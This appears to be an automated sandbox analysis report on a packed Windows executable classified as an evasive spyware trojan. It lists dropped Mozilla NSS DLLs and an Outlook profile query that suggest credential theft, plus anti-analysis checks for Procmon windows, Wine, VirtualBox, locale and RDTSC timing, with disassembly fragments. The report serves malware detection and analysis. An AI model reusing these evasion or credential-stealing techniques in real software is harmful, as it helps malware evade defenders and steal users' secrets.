Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3	0_2_00A680B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6903C	0_2_00B6903C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6A82B	0_2_00A6A82B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A591AC	0_2_00A591AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE212F	0_2_00AE212F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B3ABF	0_2_009B3ABF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6EA9A	0_2_00A6EA9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099AA18	0_2_0099AA18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0093DA1C	0_2_0093DA1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5AA4F	0_2_00A5AA4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A64B80	0_2_00A64B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A44BF6	0_2_00A44BF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095C338	0_2_0095C338
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5FB71	0_2_00A5FB71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5C4BD	0_2_00A5C4BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2A410	0_2_00A2A410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A665F0	0_2_00A665F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A47526	0_2_00A47526
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00993D13	0_2_00993D13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009836B8	0_2_009836B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A61687	0_2_00A61687
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6B612	0_2_00A6B612
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A70653	0_2_00A70653
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00984E65	0_2_00984E65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A71F84	0_2_00A71F84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5E78B	0_2_00A5E78B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009127DA	0_2_009127DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00913709	0_2_00913709
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00968F48	0_2_00968F48

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 006945C0 appears 316 times

Source: file.exe, 00000000.00000002.2014803801.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2014941392.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: qkgtngkb ZLIB complexity 0.9950636183631564

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/21@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_006A9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_006A3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\L4QL5XA0.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1797043582.000000001D4B4000.00000004.00000020.00020000.00000000.sdmp, AAEBAKKJKKEBKFIDBFBA.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2014433771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 42%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1901568 > 1048576

Source: file.exe

Static PE information: Raw size of qkgtngkb is bigger than: 0x100000 < 0x1aa200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2014899575.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014709377.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2014899575.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.690000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qkgtngkb:EW;rhnfitks:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qkgtngkb:EW;rhnfitks:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006A9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d49db should be: 0x1da3ef

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: qkgtngkb
Source: file.exe	Static PE information: section name: rhnfitks
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edx; mov dword ptr [esp], 59F32914h	0_2_00A680B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 21F7CDB0h; mov dword ptr [esp], eax	0_2_00A680EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 75393FB1h; mov dword ptr [esp], edx	0_2_00A68129
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edi; mov dword ptr [esp], eax	0_2_00A6814B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebp; mov dword ptr [esp], 7EDF652Dh	0_2_00A68158
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push eax; mov dword ptr [esp], ebx	0_2_00A68178
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edx; mov dword ptr [esp], edi	0_2_00A6817C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebx; mov dword ptr [esp], ecx	0_2_00A681CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 421B8FD8h; mov dword ptr [esp], edi	0_2_00A681F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push esi; mov dword ptr [esp], 308BDA98h	0_2_00A68286
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebp; mov dword ptr [esp], 6D608F2Ch	0_2_00A6829A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebx; mov dword ptr [esp], 57B795DCh	0_2_00A682A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 7793684Fh; mov dword ptr [esp], ebp	0_2_00A683D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ecx; mov dword ptr [esp], eax	0_2_00A68487
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 4F6066FAh; mov dword ptr [esp], ecx	0_2_00A68550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebx; mov dword ptr [esp], eax	0_2_00A686D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebx; mov dword ptr [esp], edx	0_2_00A68705
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 0531ECFEh; mov dword ptr [esp], ecx	0_2_00A68762
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push eax; mov dword ptr [esp], ebx	0_2_00A68820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 4C3200A6h; mov dword ptr [esp], esi	0_2_00A68833
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edx; mov dword ptr [esp], edi	0_2_00A68845
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edi; mov dword ptr [esp], 1F16E975h	0_2_00A68895
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push ebp; mov dword ptr [esp], eax	0_2_00A688C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 016033E0h; mov dword ptr [esp], ebp	0_2_00A68905
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push esi; mov dword ptr [esp], ebx	0_2_00A68970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push esi; mov dword ptr [esp], 642EFAF4h	0_2_00A689A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edx; mov dword ptr [esp], eax	0_2_00A689E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 481D517Dh; mov dword ptr [esp], edx	0_2_00A68A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push edx; mov dword ptr [esp], esi	0_2_00A68ADE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 279FB07Eh; mov dword ptr [esp], eax	0_2_00A68AE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A680B3 push 264E45E3h; mov dword ptr [esp], ebx	0_2_00A68B2B

Source: file.exe

Static PE information: section name: qkgtngkb entropy: 7.953848132355263

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_006A9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13444

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77DE0 second address: A77DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76D32 second address: A76D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76D3C second address: A76D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76D44 second address: A76D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77417 second address: A7743C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FD4C8509C48h 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7743C second address: A7744C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7744C second address: A77473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FD4C8509C52h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A775E1 second address: A775E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A775E5 second address: A775F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C3Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A6F7 second address: A7A728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+122D3ABCh] 0x00000010 push 00000003h 0x00000012 mov si, ax 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D3860h] 0x0000001d push 00000003h 0x0000001f push A4209E6Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 push edx 0x0000002a pop edx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A728 second address: A7A72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A72E second address: A7A732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A732 second address: A7A762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 64209E6Ch 0x0000000f push ebx 0x00000010 or dword ptr [ebp+122D1E70h], esi 0x00000016 pop edx 0x00000017 lea ebx, dword ptr [ebp+1245C560h] 0x0000001d mov esi, dword ptr [ebp+122D37A0h] 0x00000023 mov dl, 5Ch 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 jng 00007FD4C8509C36h 0x0000002f pop edi 0x00000030 rdtsc
